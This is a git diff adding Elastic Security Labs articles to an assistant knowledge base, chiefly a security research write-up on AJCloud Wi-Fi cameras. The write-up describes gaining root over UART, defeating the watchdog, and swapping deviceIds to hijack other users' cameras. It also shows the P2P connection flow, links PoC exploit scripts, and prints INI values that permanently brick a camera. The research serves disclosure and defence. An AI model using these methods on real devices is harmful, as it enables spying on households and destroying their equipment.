+Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the [“New Terms” rule type](https://www.elastic.co/guide/en/security/8.4/rules-ui-create.html#create-new-terms-rule), which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.
+
+![First Seen](/assets/images/stopping-vulnerable-driver-attacks/image5.jpg)
+
+This empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.
+
+![Visualizing It](/assets/images/stopping-vulnerable-driver-attacks/image4.jpg)
+
+## Conclusion
+
+Vulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies such as behavior control and anomaly detection to raise the cost further without requiring significant security expertise or resources to achieve.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/storm_on_the_horizon.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/storm_on_the_horizon.md
new file mode 100644
index 0000000000000..f8ca66265d440
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/storm_on_the_horizon.md
@@ -0,0 +1,300 @@
+---
+title: "Storm on the Horizon: Inside the AJCloud IoT Ecosystem"
+slug: "storm-on-the-horizon"
+date: "2024-09-20"
+description: "Wi-Fi cameras are popular due to their affordability and convenience but often have security vulnerabilities that can be exploited."
+author:
+  - slug: mark-mager
+  - slug: eric-forte
+image: "storm-on-the-horizon.jpg"
+category:
+  - slug: security-research
+  - slug: perspectives
+tags:
+  - iot
+  - defcon
+---
+
+## Introduction
+
+Wi-Fi cameras are some of the most common IoT devices found in households, businesses, and other public spaces. They tend to be quite affordable and provide users with easy access to a live video stream on their mobile device from anywhere on the planet. As is often the case with IoT devices, security tends to be overlooked in these cameras, leaving them open to critical vulnerabilities. If exploited, these vulnerabilities can lead to devastating effects on the cameras and the networks within which they’re deployed. They can lead to the compromise of the sensitive PII of their users.
+
+A recent [Elastic ON Week](https://www.youtube.com/watch?v=qoojLdKJvkc) afforded us the opportunity to explore the attack surface of these types of devices to gain a deeper understanding of how they are being compromised. We focused primarily on performing vulnerability research on the [Wansview Q5](https://www.amazon.com/Wireless-Security-Wansview-Detection-Compatible/dp/B07QKXM2D3?th=1) (along with the nearly identical [Q6](https://www.wansview.com/q6)), one of the more popular and affordable cameras sold on Amazon. Wansview is a provider of security products based in Shenzhen, China, and one of Amazon's more prominent distributors of Wi-Fi cameras.
+
+![](/assets/images/storm-on-the-horizon/image12.png "image_tooltip")
+
+The Q5 offers the same basic feature set seen in most cameras:
+
+* Pan / tilt / zoom
+* Night vision
+* Two-way audio
+* Video recording to SD card
+* Integration with Smart Home AI assistants (e.g. Alexa)
+* ONVIF for interoperability with other security products
+* RTSP for direct access to video feed within LAN
+* Automated firmware updates from the cloud
+* Remote technical support
+* Shared device access with other accounts
+* Optional monthly subscription for cloud storage and motion detection
+
+Like most other Wi-Fi cameras, these models require an active connection to their vendor cloud infrastructure for basic operation; without access to the Internet, they simply will not operate. Before a camera can go live, it must be paired to a [registered user account](https://www.youtube.com/watch?v=UiF7xKnXfC0) via Wansview’s official mobile app and a standard [QR code-based setup process](https://youtu.be/PLMNKoO1214?si=G8sYxT3EagE3u_cw). Once this process is complete, the camera will be fully online and operational.
+
+## AJCloud: A Brief Introduction
+
+Though Wansview has been in operation [since 2009](https://www.wansview.com/about_company), at the moment they primarily appear to be a reseller of camera products built by a separate company based in Nanjing, China: [AJCloud](https://www.ajcloud.net).
+
+![](/assets/images/storm-on-the-horizon/image19.png "image_tooltip")
+
+AJCloud provides vendors with access to manufactured security devices, the necessary firmware, mobile and desktop user applications, the cloud management platform, and services that connect everything together. Since AJCloud was founded in 2018, they have partnered with several vendors, both large and small, including but not limited to the following:
+
+* [Wansview](https://www.wansview.com)
+* [Cinnado](https://cinnado.com)
+* [Galayou](https://www.amazon.com/stores/GALAYOU/page/789538ED-82AC-43AF-B676-6622577A1982?ref_=ast_bln&store_ref=bl_ast_dp_brandLogo_sto)
+* [Faleemi](https://www.faleemi.com)
+* [Philips](https://www.philips.com)
+* [Septekon](https://www.septekon.com)
+* [Smarteye](https://www.smarteyegroup.com)
+* [Homeguard](http://www.homeguardworld.com)
+* [iPupPee](https://ipuppee.com)
+
+A cursory review of mobile and desktop applications developed and published by AJCloud on [Google Play](https://play.google.com/store/apps/developer?id=AJCLOUD+INTERNATIONAL+INC.&hl=en_US), [Apple’s App Store](https://apps.apple.com/us/developer/ajcloud-labs-inc/id1396464400), and the [Microsoft Store](https://apps.microsoft.com/search/publisher?name=%E5%8D%97%E4%BA%AC%E5%AE%89%E5%B1%85%E4%BA%91%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&hl=en-us&gl=US) reveals their ties to each of these vendors. Besides superficial company branding, these applications are identical in form and function, and they all require connectivity with the AJCloud management platform.
+
+![](/assets/images/storm-on-the-horizon/image26.png "image_tooltip")
+
+As for the cameras, it is apparent that these vendors are selling similar models with only minor modifications to the camera housing and underlying hardware.
+
+![](/assets/images/storm-on-the-horizon/image16.png "image_tooltip")
+
+![](/assets/images/storm-on-the-horizon/image9.png "image_tooltip")
+
+The resemblance between the [Faleemi 886](https://www.faleemi.com/product/fsc886/) and the [Wansview Q6 (1080p)](https://www.youtube.com/watch?v=X5P5fGhRxAs) is obvious
+
+Reusing hardware manufacturing and software development resources likely helps to control costs and simplify logistics for AJCloud and its resellers. However, this streamlining of assets also means that security vulnerabilities discovered in one camera model would likely permeate all products associated with AJCloud.
+
+Despite its critical role in bringing these devices to consumers, AJCloud has a relatively low public profile. However, IPVM researchers recently [published](https://ipvm.com/reports/ajcloud-wansview-leak) research on a significant vulnerability (which has since been resolved) in AJCloud’s GitLab repository. This vulnerability would allow any user to access source code, credentials, certificates, and other sensitive data without requiring authentication.
+
+Though total sales figures are difficult to derive for Wansview and other vendors in the Wi-Fi camera space, IPVM estimated that at least one million devices were connected to the AJCloud platform at the time of publication of their report. As camera sales [continue to soar](https://www.statista.com/forecasts/1301193/worldwide-smart-security-camera-homes) into the hundreds of millions, it is safe to assume that more of AJCloud’s devices will be connected in homes across the world for years to come.
+
+## Initial Vulnerability Research Efforts
+
+To gain a deeper understanding of the security posture of the Wansview Q5, we attacked it from multiple angles:
+
+![](/assets/images/storm-on-the-horizon/image23.png "image_tooltip")
+
+At first, our efforts were primarily focused on active and passive network reconnaissance of the camera and the [Android version](https://play.google.com/store/apps/details?id=net.ajcloud.wansviewplus&hl=en_US) of Wansview Cloud, Wansview’s official mobile app. We scanned for open ports, eavesdropped on network communications through man-in-the-middle (MitM) attacks, attempted to coerce unpredictable behavior from the cameras through intentional misconfiguration in the app, and disrupted the operation of the cameras by abusing the QR code format and physically interacting with the camera. The devices and their infrastructure were surprisingly resilient to these types of surface-level attacks, and our initial efforts yielded few noteworthy successes.
+
+We were particularly surprised by our lack of success intercepting network communications on both the camera and the app. We repeatedly encountered robust security features (e.g., certificate pinning, app and OS version restrictions, and properly secured TLS connections) that disrupted our attempts.
+
+![](/assets/images/storm-on-the-horizon/image13.png "image_tooltip")
+
+Reverse engineering tools allowed us to analyze the APK much more closely, though the complexity of the code obfuscation observed within the decompiled Java source code would require an extended length of time to fully piece together.
+
+Our limited initial success would require us to explore further options that would provide us with more nuanced insight into the Q5 and how it operates.
+
+## Initial Hardware Hacking
+
+To gain more insight into how the camera functioned, we decided to take a closer look at the camera firmware. While some firmware packages are available online, we wanted to take a look at the code directly and be able to monitor it and the resulting logs while the camera was running. To do this, we first took a look at the hardware diagram for the system on a chip (SoC) to see if there were any hardware avenues we might be able to leverage. The Wansview Q5 uses a [Ingenic Xburst T31 SoC](https://www.cnx-software.com/2020/04/26/ingenic-t31-ai-video-processor-combines-xburst-1-mips-and-risc-v-lite-cores/), its system block diagram is depicted below.
+
+![](/assets/images/storm-on-the-horizon/image4.png "image_tooltip")
+
+One avenue that stood out to us was the I2Cx3/UARTx2/SPIx2 SPI I/O block. If accessible, these I/O blocks often provide log output interfaces and/or shell interfaces, which can be used for debugging and interacting with the SoC. Appearing promising, we then performed a hardware teardown of the camera and found what appeared to be a UART serial interface to the SoC, shown below.
+
+![](/assets/images/storm-on-the-horizon/image15.png "image_tooltip")
+
+Next, we connected a logic analyzer to see what protocol was being used over these pins, and when decoded, the signal was indeed UART.
+
+![](/assets/images/storm-on-the-horizon/image33.png "image_tooltip")
+
+Now that we can access an exposed UART interface, we then looked to establish a shell connection to the SoC via UART. There are a number of different software mechanisms to do this, but for our purposes we used the Unix utility `screen` with the detected baud rate from the logic analyzer. 
+
+![](/assets/images/storm-on-the-horizon/image11.png "image_tooltip")
+
+Upon opening and monitoring the boot sequence, we discovered that secure boot was not enabled despite being supported by the SoC. We then proceeded to modify the configuration to boot into single user mode providing a root shell for us to use to examine the firmware before the initialization processes were performed, shown below. 
+
+![](/assets/images/storm-on-the-horizon/image29.png "image_tooltip")
+
+Once in single-user mode, we were able to pull the firmware files for static analysis using the `binwalk` utility, as shown below. 
+
+![](/assets/images/storm-on-the-horizon/image32.png "image_tooltip")
+
+At this stage, the filesystem is generally read-only; however, we wanted to be able to make edits and instantiate only specific parts of the firmware initialization as needed, so we did some quick setups for additional persistence beyond single-user mode access. This can be done in a number of ways, but there are two primary methods one may wish to use. Generally speaking, in both approaches, one will want to make as few modifications to the existing configuration as possible. This is generally preferred when running dynamic analysis if possible, as we have had the least impact on the run time environment. One method we used for this approach is to make a `tmpfs` partition for read/write access in memory and mount it via `fstab`. In our case `fstab` was already considered in such a way that supported this, and as such made it a very minimal change. See the commands and results for this approach below.
+
+![](/assets/images/storm-on-the-horizon/image17.png "image_tooltip")
+
+Another method is to pull existing user credentials and attempt to use these to log in. This approach was also successful. The password hash for the root user can be found in the `etc/passwd` file and decrypted using a tool like John the Ripper. In our above examples, we were transferring data and files entirely over the serial connection. The camera also has an available SD card slot that can be mounted and used to transfer files. Going forward, we will be using the SD card or local network for moving files as the bandwidth makes for faster and easier transfer; however, serial can still be used for all communications for the hardware setup and debugging if preferred.
+
+Now, we have root level access to the camera providing access to the firmware and dmesg logs while the software is running. Using both the firmware and logs as reference, we then looked to further examine the user interfaces for the camera to see if there was a good entry point we could use to gain further insight.
+
+## Wansview Cloud for Windows
+
+After the mobile apps proved to be more secure than we had originally anticipated, we shifted our focus to an older version of the Wansview Cloud application built for Windows 7. This app, which is still [available for download](https://www.wansview.com/support_download), would provide us with direct insight into the network communications involved with cameras connected to the AJCloud platform.
+
+Thanks in large part to overindulgent debug logging on behalf of the developers, the Windows app spills out its secrets with reckless abandon seldom seen in commercial software. The first sign that things are amiss is that user login credentials are logged in cleartext.
+
+![](/assets/images/storm-on-the-horizon/image24.png "image_tooltip")
+
+Reverse engineering the main executable and DLLs (which are not packed, unlike the Wansview Cloud APK) was expedited thanks to the frequent use of verbose log messages containing unique strings. Identifying references to specific files and lines within its underlying codebase helped us to quickly map out core components of the application and establish the high level control flow.
+
+Network communications, which were difficult for us to intercept on Android, are still transmitted over TLS, though they are conveniently logged to disk in cleartext. With full access to all HTTP POST request and response data (which is packed into JSON objects), there was no further need to pursue MitM attacks on the application side. 
+
+![POST request to https://sdc-portal.ajcloud.net/api/v1/app-startup](/assets/images/storm-on-the-horizon/image8.png "POST request to https://sdc-portal.ajcloud.net/api/v1/app-startup")
+
+![POST response from https://sdc-portal.ajcloud.net/api/v1/app-startup](/assets/images/storm-on-the-horizon/image25.png "POST response from https://sdc-portal.ajcloud.net/api/v1/app-startup")
+
+Within the POST responses, we found sensitive metadata including links to publicly accessible screen captures along with information about the camera’s location, network configuration, and its firmware version.
+
+![https://cam-snapshot-use1.oss-us-east-1.aliyuncs.com/f838ee39636aba95db7170aa321828a1/snapshot.jpeg](/assets/images/storm-on-the-horizon/image1.jpg "https://cam-snapshot-use1.oss-us-east-1.aliyuncs.com/f838ee39636aba95db7170aa321828a1/snapshot.jpeg")
+
+![POST response from https://cam-gw-us.ajcloud.net/api/v1/fetch-infos](/assets/images/storm-on-the-horizon/image10.png "POST response from https://cam-gw-us.ajcloud.net/api/v1/fetch-infos")
+
+After documenting all POST requests and responses found within the log data, we began to experiment with manipulating different fields in each request in an attempt to access data not associated with our camera or account. We would eventually utilize a debugger to change the deviceId to that of a target camera not paired with the current logged in account. A camera deviceId doubles as its serial number and can be found printed on a sticker label located on either the back or bottom of a camera.
+
+![](/assets/images/storm-on-the-horizon/image2.png "image_tooltip")
+
+We found the most appropriate target for our attack in a code section where the deviceId is first transmitted in a POST request to [https://sdc-us.ajcloud.net/api/v1/dev-config](https://sdc-us.ajcloud.net/api/v1/dev-config):
+
+![](/assets/images/storm-on-the-horizon/image31.png "image_tooltip")
+
+Our plan was to set a breakpoint at the instruction highlighted in the screenshot above, swap out the deviceId within memory, and then allow the app to resume execution.
+
+Amazingly enough, this naive approach not only worked to retrieve sensitive data stored in the AJCloud platform associated with the target camera and the account it is tied to, but it also connected us to the camera itself. This allowed us to access its video and audio streams and remotely control it through the app as if it were our own camera.
+
+Through exploiting this vulnerability and testing against multiple models from various vendors, we determined that all devices connected to the AJCloud platform could be remotely accessed and controlled in this manner. We wrote a [PoC exploit script](https://github.com/elastic/camera-hacks/blob/main/windows/win_exploit.py) to automate this process and effectively demonstrate the ease with which this access control vulnerability within AJCloud’s infrastructure can be trivially exploited.
+
+## Exploring the network communications
+
+Though we were able to build and reliably trigger an exploit against a critical vulnerability in the AJCloud platform, we would need to dig further in order to gain a better understanding of the inner workings of the apps, the camera firmware, and the cloud infrastructure.
+
+As we explored beyond the POST requests and responses observed throughout the sign-in process, we noticed a plethora of UDP requests and responses from a wide assortment of IPs. Little in the way of discernible plaintext data could be found throughout these communications, and the target UDP port numbers for the outbound requests seemed to vary. Further investigation would later reveal that this UDP activity was indicative of PPPP, an IoT peer-to-peer (P2P) protocol that was analyzed and demonstrated extensively by Paul Marrapesse during his [presentation at DEF CON 28](https://youtu.be/Z_gKEF76oMM?si=cqCBU6iPxCyEm-xm). We would later conclude that the way in which we exploited the vulnerability we discovered was facilitated through modified P2P requests, which led us to further explore the critical role that P2P plays in the AJCloud platform.
+
+![](/assets/images/storm-on-the-horizon/image22.png "image_tooltip")
+
+The main purpose of P2P is to facilitate communication between applications and IoT devices, regardless of the network configurations involved. P2P primarily utilizes an approach based around [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) to create temporary communication pathways that allow requests to reach their target either directly or through a relay server located in a more accessible network environment. The core set of P2P commands integrated into AJCloud’s apps provides access to video and audio streams as well as the microphone and pan/tilt/zoom.
+
+## Advanced Hardware Hacking
+
+With our additional understanding of the P2P communications, it was now time to examine the camera itself more closely during these P2P conversations, including running the camera software in a debugger. To start, we set up the camera with a live logging output via the UART serial connection that we established earlier, shown below.
+
+![](/assets/images/storm-on-the-horizon/image5.png "image_tooltip")
+
+This provided a live look at the log messages from the applications as well as any additional logging sources we needed. From this information, we identified the primary binary that is used to establish communication between the camera and the cloud as well as providing the interfaces to access the camera via P2P. 
+
+This binary is locally called initApp, and it runs once the camera has been fully initialized and the boot sequence is completed. Given this, we set out to run this binary with a debugger to better evaluate the local functions. In attempting to do so, we encountered a kernel watchdog that detected when initApp was not running and would forcibly restart the camera if it detected a problem. This watchdog checks for writes to `/dev/watchdog` and, if these writes cease, will trigger a timer that will reboot the camera if the writes do not resume. This makes debugging more difficult as when one pauses the execution of initApp, the writes to the watchdog pause as well. An example of this stopping behavior is shown below:
+
+![](/assets/images/storm-on-the-horizon/image18.png "image_tooltip")
+
+To avoid this, one could simply try writing to the watchdog whenever initApp stops to prevent the reboot. However, another cleaner option is to make use of the magic close feature of the [Linux Kernel Watchdog Driver API](https://www.kernel.org/doc/Documentation/watchdog/watchdog-api.txt). In short, if one writes a specific magic character ‘V’ `/dev/watchdog` the watchdog will be disabled. There are other methods of defeating the watchdog as well, but this was the one we chose for our research as it makes it easy to enable and disable the watchdog at will.
+
+With the watchdog disabled, setting up to debug initApp is fairly straightforward. We wanted to run the code directly on the camera, if possible, instead of using an emulator. The architecture of the camera is Little Endian MIPS (MIPSEL). We were fortunate that pre-built GDB and GDBServer binaries were able to function without modification; however, we did not know this initially, so we also set up a toolchain to compile GDBServer specifically for the camera. One technique that might be useful if you find yourself in a similar situation is to use a compilation tool like gcc to compile some source code to your suspected target architecture and see if it runs; see the example below.
+
+![](/assets/images/storm-on-the-horizon/image25.png "image_tooltip")
+
+In our case, since our SoC was known to us, we were fairly certain of the target architecture; however, in certain situations, this may not be so simple to discover, and working from hello world binaries can be useful to establish an initial understanding. Once we were able to compile binaries, we then compiled GDBServer for our camera and then used it to attach and launch initApp. Then, we connected to it from another computer on the same local network as the camera. An example of this is shown below:
+
+![](/assets/images/storm-on-the-horizon/image7.png "image_tooltip")
+
+As a note for the above example, we are using the `-x` parameter to pass in some commands for convenience, but they are not necessary for debugging. For more information on any of the files or commands, please see our [elastic/camera-hacks](https://github.com/elastic/camera-hacks/tree/main) GitHub repo. In order for initApp to load properly, we also needed to ensure that the libraries used by the binary were accessible via the `PATH` and `LD_LIBARY_PATH` environment variables. With this setup, we were then able to debug the binary as we needed. Since we also used the magic character method of defeating the watchdog earlier we also will need to make sure to control instances where the watchdog can be re-enabled. In most cases, we do not want this to happen. As such, we overwrote the watchdog calls in initApp so that the watchdog would not be re-enabled while we were debugging, as shown below.
+
+![](/assets/images/storm-on-the-horizon/image3.png "image_tooltip")
+
+The following video shows the full setup process from boot to running GDBServer. In the video, we also start a new initApp process, and as such, we need to kill both the original process and the `daemon.sh` shell script that will spawn a new initApp process if it is killed.
+
+![](/assets/images/storm-on-the-horizon/video1.gif)
+
+## Building a P2P Client
+
+In order to further explore the full extent of capabilities which P2P provides to AJCloud IoT devices and how they can be abused by attackers, we set out to build our own standalone client. This approach would remove the overhead of manipulating the Wansview Cloud Windows app while allowing us to more rapidly connect to cameras and test out commands we derive from reverse engineering the firmware.
+
+From the configuration data we obtained earlier from the Windows app logs, we knew that a client issues requests to up to three different servers as part of the connection process. These servers provide instructions to clients as to where traffic should be routed in order to access a given camera. If you would like to discover more of these servers out in the open, you can scan the Internet using the following four-byte UDP payload on port `60722`. Paul Marrapese used this technique to great effect as part of his research.
+
+![](/assets/images/storm-on-the-horizon/image34.png "image_tooltip")
+
+![](/assets/images/storm-on-the-horizon/image6.png "image_tooltip")
+
+In order to properly establish a P2P connection, a client must first send a simple hello message (`MSG_HELLO`), which needs to be ACK’d (`MSG_HELLO_ACK`) by a peer-to-peer server. The client then queries the server (`MSG_P2P_REQ`) for a particular deviceId. If the server is aware of that device, then it will respond (`MSG_PUNCH_TO`) to the client with a target IP address and UDP port number pair. The client will then attempt to connect (`MSG_PUNCH_PKT`) to the IP and port pair along with other ports [within a predetermined range](https://github.com/elastic/camera-hacks/blob/deb2abe9a7a1009c5c1b7d34584f143d5b62c82e/p2p/p2p_client.py#L247-L260) as part of a [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) routine. If successful, the target will send a message (`MSG_PUNCH_PKT`) back to the client along with a final message (`MSG_P2P_RDY`) to confirm that the connection has been established.
+
+![](/assets/images/storm-on-the-horizon/image28.gif "image_tooltip")
+
+After connecting to a camera, we are primarily interested in sending different `MSG_DRW` packets and observing their behavior. These packets contain commands which will allow us to physically manipulate the camera, view and listen to its video and audio streams, access data stored within it, or alter its configuration. The most straightforward command we started with involved panning the camera counter clockwise, which we could easily identify as a single message transmission.
+
+![](/assets/images/storm-on-the-horizon/image30.png "image_tooltip")
+
+Debug log messages on the camera allowed us to easily locate where this command was processed within the firmware.
+
+![](/assets/images/storm-on-the-horizon/image20.png "image_tooltip")
+
+Locating the source of this particular message placed us in the main routine which handles processing MSG_DRW messages, which provided us with critical insight into how this command is invoked and what other commands are supported by the firmware.
+
+![](/assets/images/storm-on-the-horizon/image14.png "image_tooltip")
+
+Extensive reverse engineering and testing allowed us to build a [PoC P2P client](https://github.com/elastic/camera-hacks/blob/main/p2p/p2p_client.py) which allows users to connect to any camera on the AJCloud platform, provided they have access to its deviceId. Basic commands supported by the client include camera panning and tilting, rebooting, resetting, playing audio clips, and even crashing the firmware.
+
+The most dangerous capability we were able to implement was through a command which modifies a core device configuration file: `/var/syscfg/config_default/app_ajy_sn.ini`. On our test camera, the file’s contents were originally as follows:
+
+```
+[common]
+product_name=Q5
+model=NAV
+vendor=WVC
+serialnum=WVCD7HUJWJNXEKXF
+macaddress=
+wifimacaddress=
+```
+
+While this appears to contain basic device metadata, this file is the only means through which the camera knows how to identify itself. Upon startup, the camera reads in the contents of this file and then attempts to connect to the AJCloud platform through a series of curl requests to various API endpoints. These curl requests pass along the product name, camera model, vendor code, and serial number values extracted from the INI file as query string arguments. We used our client to deliver a message which overwrites the contents like so:
+
+```
+[common]
+product_name=
+model=OPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01
+vendor=YZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01
+serialnum=defghijklmnopqrstuvwxyz{|}~HH01
+macaddress=
+wifimacaddress=
+```
+
+After the camera is reset, all curl requests issued to AJCloud platform API endpoints as part of the startup routine will fail due to the malformed data contained within the INI file. These requests will continue to periodically be sent, but they will never succeed and the camera will remain inactive and inaccessible through any apps. Unfortunately, there is no simple way to restore the previous file contents through resetting the camera, updating its firmware, or restoring the factory settings. File modifications carried out through this command will effectively brick a camera and render it useless.
+
+<iframe src="https://drive.google.com/file/d/1oK_umHYfScza-F5RQNUGgFe3GFOt5n--/preview" width="640" height="480" allow="autoplay"></iframe>
+
+Taking a closer look at the decompiled function (`syscfg_setAjySnParams`) which overwrites the values stored in `app_ajy_sn.ini`, we can see that input parameters, extracted from the `MSG_DRW` command are used to pass along string data which will be used to overwrite the model, vendor, and serial number fields in the file. memset is used to overwrite three global variables, intended to store these input strings, with null bytes. strcpy is then used to transfer the input parameters into these globals. In each instance, this will result in bytes being copied directly from the `MSG_DRW` command buffer until it encounters a null character.
+
+![](/assets/images/storm-on-the-horizon/image21.png "image_tooltip")
+
+Because no validation is enforced on the length of these input parameters extracted from the command, it is trivial to craft a message of sufficient length which will trigger a buffer overflow. While we did not leverage this vulnerability as part of our attack to brick the camera, this appears to be an instance where an exploit could be developed which would allow for an attacker to achieve remote code execution on the camera.
+
+## Impact
+
+We have confirmed that a broad range of devices across several vendors affiliated with AJCloud and several different firmware versions are affected by these vulnerabilities and flaws. Overall, we successfully demonstrated our attacks against fifteen different camera products from Wansview, Galayou, Cinnado, and Faleemi. Based on our findings, it is safe to assume that all devices which operate AJCloud firmware and connect to the AJCloud platform are affected.
+
+All attempts to contact both AJCloud and Wansview in order to disclose these vulnerabilities and flaws were unsuccessful.
+
+## What did the vendors do right?
+
+Despite the vulnerabilities we discovered and discussed previously, there are a number of the security controls that AJCloud and the camera vendors implemented well. For such a low cost device, many best practices were implemented. First, the network communications are secured well using certificate based WebSocket authentication. In addition to adding encryption, putting many of the API endpoints behind the certificate auth makes man in the middle attacks significantly more challenging. Furthermore, the APKs for the mobile apps were signed and obfuscated making manipulating these apps very time consuming. 
+
+Additionally, the vendors also made some sound decisions with the camera hardware and firmware. The local OS for the camera is effectively limited, focusing on just the needed functionality for their product. The file system is configured to be read only, outside of logging, and the kernel watchdog is an effective method of ensuring uptime and reducing risk of being stuck in a failed state. The Ingenic Xburst T31 SoC, provides a capable platform with a wide range of support including secure boot, a Power-On Reset (POR) watchdog, and a separate RISC-V processor capable of running some rudimentary machine learning on the camera input.
+
+## What did the vendors do wrong?
+
+Unfortunately, there were a number of missed opportunities with these available features. Potentially the most egregious is the unauthenticated cloud access. Given the API access controls established for many of the endpoints, having the camera user access endpoints available via serial number without authentication is a huge and avoidable misstep. The P2P protocol is also vulnerable as we showcased, but compared to the API access which should be immediately fixable, this may take some more time to fix the protocol. It is a very dangerous vulnerability, but it is a little bit more understandable as it requires considerably more time investment to both discover and fix. 
+
+From the application side, the primary issue is with the Windows app which has extensive debug logging which should have been removed before releasing publicly. As for the hardware, it can be easily manipulated with physical access (exposed reset button, etc.). This is not so much an issue given the target consumer audience. It is expected to err on the side of usability rather than security, especially given physical access to the device. On a similar note, secure boot should be enabled, especially given that the T31 SoC supports it. While not strictly necessary, this would make it much harder to debug the source code and firmware of the device directly, making it more difficult to discover vulnerabilities that may be present. Ideally it would be implemented in such a way that the bootloader could still load an unsigned OS to allow for easier tinkering and development, but would prevent the signed OS from loading until the boot loader configuration is restored. However, one significant flaw in the current firmware is the dependence on the original serial number that is not stored in a read only mount point while the system is running. Manipulating the serial number should not permanently brick the device. It should either have a mechanism for requesting a new serial number (or restoring its original serial number) should its serial number be overwritten, or the serial number should be immutable. 
+
+## Mitigations
+
+Certain steps can be taken in order to reduce the attack surface and limit potential adverse effects in the event of an attack, though they vary in their effectiveness.
+
+Segmenting Wi-Fi cameras and other IoT devices off from the rest of your network is a highly recommended countermeasure which will prevent attackers from pivoting laterally to more critical systems. However, this approach does not prevent an attacker from obtaining sensitive user data through exploiting the access control vulnerability we discovered in the AJCloud platform. Also, considering the ease in which we were able to demonstrate how cameras could be accessed and manipulated remotely via P2P, any device connected to the AJCloud platform is still at significant risk of compromise regardless of its local network configuration.
+
+Restricting all network communications to and from these cameras would not be feasible due to how essential connectivity to the AJCloud platform is to their operation. As previously mentioned, the devices will simply not operate if they are unable to connect to various API endpoints upon startup.
+
+A viable approach could be restricting communications beyond the initial startup routine. However, this would prevent remote access and control via mobile and desktop apps, which would defeat the entire purpose of these cameras in the first place. For further research in this area, please refer to “[Blocking Without Breaking: Identification and Mitigation of Non-Essential IoT Traffic](https://petsymposium.org/popets/2021/popets-2021-0075.pdf)”, which explored this approach more in-depth across a myriad of IoT devices and vendors.
+
+The best approach to securing any Wi-Fi camera, regardless of vendor, while maintaining core functionality would be to flash it with alternative open source firmware such as [OpenIPC](https://openipc.org) or [thingino](https://thingino.com). Switching to open source firmware avoids the headaches associated with forced connectivity to vendor cloud platforms by providing users with fine grain control of device configuration and remote network accessibility. Open access to the firmware source helps to ensure that critical flaws and vulnerabilities are quickly identified and patched by diligent project contributors.
+
+## Key Takeaways
+
+Our research revealed several critical vulnerabilities that span all aspects of cameras operating AJCloud firmware which are connected to their platform. Significant flaws in access control management on their platform and the PPPP peer protocol provides an expansive attack surface which affects millions of active devices across the world. Exploiting these flaws and vulnerabilities leads to the exposure of sensitive user data and provides attackers with full remote control of any camera connected to the AJCloud platform. Furthermore, a built-in P2P command, which intentionally provides arbitrary write access to a key configuration file, can be leveraged to either permanently disable cameras or facilitate remote code execution through triggering a buffer overflow.
+
+Please visit our [GitHub repository](https://github.com/elastic/camera-hacks) for custom tools and scripts we have built along with data and notes we have captured which we felt would provide the most benefit to the security research community.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/streamlining_esql_query_and_rule_validation.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/streamlining_esql_query_and_rule_validation.md
new file mode 100644
index 0000000000000..d5950d772d400
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/streamlining_esql_query_and_rule_validation.md
@@ -0,0 +1,219 @@
+---
+title: "Streamlining ES|QL Query and Rule Validation: Integrating with GitHub CI"
+slug: "streamlining-esql-query-and-rule-validation"
+date: "2023-11-17"
+description: "ES|QL is Elastic's new piped query language. Taking full advantage of this new feature, Elastic Security Labs walks through how to run validation of ES|QL rules for the Detection Engine."
+author:
+  - slug: mika-ayenson
+  - slug: eric-forte
+image: "photo-edited-01.png"
+category:
+  - slug: security-research
+---
+
+One of the amazing, recently premiered [8.11.0 features](https://www.elastic.co/guide/en/elasticsearch/reference/current/release-highlights.html), is the Elasticsearch Query Language ([ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html)). As highlighted in an earlier [post by Costin Leau](https://www.elastic.co/blog/elasticsearch-query-language-esql), it’s a full-blown, specialized query and compute engine for Elasitcsearch. Now that it’s in technical preview, we wanted to share some options to _validate_ your ES|QL queries. This overview is for engineers new to ES|QL. Whether you’re searching for insights in Kibana or investigating security threats in [Timelines](https://www.elastic.co/guide/en/security/current/timelines-ui.html), you’ll see how this capability is seamlessly interwoven throughout Elastic.       
+
+## ES|QL validation basics ft. Kibana & Elasticsearch
+
+If you want to quickly validate a single query, or feel comfortable manually testing queries one-by-one, the Elastic Stack UI is all you need. After navigating to the Discover tab in Kibana, click on the "**Try ES|QL**" Technical Preview button in the Data View dropdown to load the query pane. You can also grab sample queries from the  [ES|QL Examples](https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-examples.html) to get up and running. Introducing non-[ECS](https://www.elastic.co/guide/en/ecs/current/index.html) fields will immediately highlight errors prioritizing syntax errors, then unknown column errors.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image7.png)
+
+In this example, there are two syntax errors that are highlighted:  
+* the invalid syntax error on the input `wheres` which should be `where` and  
+* the unknown column `process.worsking_directory`, which should be `process.working_directory`.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image3.png)
+
+After resolving the syntax error in this example, you’ll observe the Unknown column errors. Here are a couple reasons this error may appear: 
+
+ - **Fix Field Name Typos**: Sometimes you simply need to fix the name as suggested in the error; consult the ECS or any integration schemas and confirm the fields are correct
+ - **Add Missing Data**: If you’re confident the fields are correct, sometimes adding data to your stack, which will populate the columns
+ - **Update Mapping**: You can configure [Mappings](https://www.elastic.co/guide/en/elasticsearch/reference/8.11/mapping.html) to set explicit fields, or add new fields to an existing data stream or index using the [Update Mapping API](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-put-mapping.html) 
+
